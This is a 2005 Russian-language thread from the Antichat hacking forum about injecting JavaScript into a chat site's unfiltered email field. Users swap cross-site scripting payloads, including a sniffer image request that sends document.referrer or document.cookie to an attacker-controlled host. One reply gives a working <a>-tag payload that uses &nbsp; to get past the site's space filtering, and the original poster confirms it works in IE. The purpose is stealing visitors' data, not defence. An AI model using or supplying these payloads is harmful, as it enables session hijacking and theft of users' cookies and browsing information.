ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вставить Javascript в тег <a href....
  #1  
Старый 07.09.2005, 18:33
Аватар для Dmitro
Dmitro
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме:
130949

Репутация: 34
Отправить сообщение для Dmitro с помощью ICQ
По умолчанию Вставить Javascript в тег <a href....

Приветик уважаемые,
Подскажите как вставить Javascript в тег "a"

В одном чате форма ввода мыла пропускает любые кавычки. я вставляю снифер:

style="background-color:ffffff; color:ffffff; font-size:1px; background-image:url(http://САЙТ/cgi-bin/СНИФЕР.jpg); background-repeat:no-repeat"

Но снифер отображает текущего реферера, а мне нужен тот, с какого попали на эту страницу (инфа юзера)
Надо вставить скрипт :
<script>refer=document.referrer;</script>
<script>img = new Image(); img.src = "http://САЙТ/cgi-bin/statistic/СНИФЕР.jpg?"+refer;</script>

Что-то типо:
<a href mailto: ..... style="
background:url(javascript:img = new Image(); img.src = 'http://САЙТ/cgi-bin/statistic/СНИФЕР.jpg?'+document.referrer; )"

Посмотрите, как правильно это записать, чёт не получается...

З.Ы. или вместо document.referrer , можно document.cookie
а ещё вариант, можно ли туда script src="Bla-bla.js" ?

Последний раз редактировалось Dmitro; 07.09.2005 в 19:23..
 
Ответить с цитированием

гм...
  #2  
Старый 08.09.2005, 10:26
Аватар для Dmitro
Dmitro
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме:
130949

Репутация: 34
Отправить сообщение для Dmitro с помощью ICQ
По умолчанию гм...

?? ?? ?
похоже сайт забросили..
 
Ответить с цитированием

  #3  
Старый 08.09.2005, 15:45
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Если в снифер включена переменнна HTTP_REFERER, то он сам покажет его.

Сделай свой снифер... http://www.antixak.spb.ru/topics.php?tid=3

А там разберешься )))
 
Ответить с цитированием

нет
  #4  
Старый 08.09.2005, 18:21
Аватар для Dmitro
Dmitro
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме:
130949

Репутация: 34
Отправить сообщение для Dmitro с помощью ICQ
По умолчанию нет

Переменная HTTP_REFERER есть, но она показывает текущего (адрес страницы на которой вставлен снифер) а надо поймать адрес страницы, с которой зашли на данную.

Я так делал внедряя в страницу скрипт:

<script>img = new Image(); img.src = "http://САЙТ/cgi-bin/СНИФЕР.jpg?"+document.referrer;</script>


А вот как это сделать через <a href..... ????

З.Ы. хороший у тя сайт

Последний раз редактировалось Dmitro; 08.09.2005 в 18:24..
 
Ответить с цитированием

  #5  
Старый 08.09.2005, 18:48
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию

<a href=lol.htm

style=background:url("javascript:img=new&nbsp;Imag e();img.src='http://САЙТ/cgi-bin/СНИФЕР.jpg?'+document.referrer")>ssssss</a>
 
Ответить с цитированием

!
  #6  
Старый 08.09.2005, 19:22
Аватар для Dmitro
Dmitro
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме:
130949

Репутация: 34
Отправить сообщение для Dmitro с помощью ICQ
По умолчанию !

Zadoxlik, УМНИЦА !!!
чёш я такой лол не догадался про &nbsp; ?!
А я голову ломал как без пробела....
СПАСИБО !!
Теперь всё работает, но только под IE, а опера ни-ни...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books JS FRAGNATIC PHP, PERL, MySQL, JavaScript 0 11.08.2005 16:57
Bypassing JavaScript Filters the Flash! Attack k00p3r Чужие Статьи 0 12.07.2005 16:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ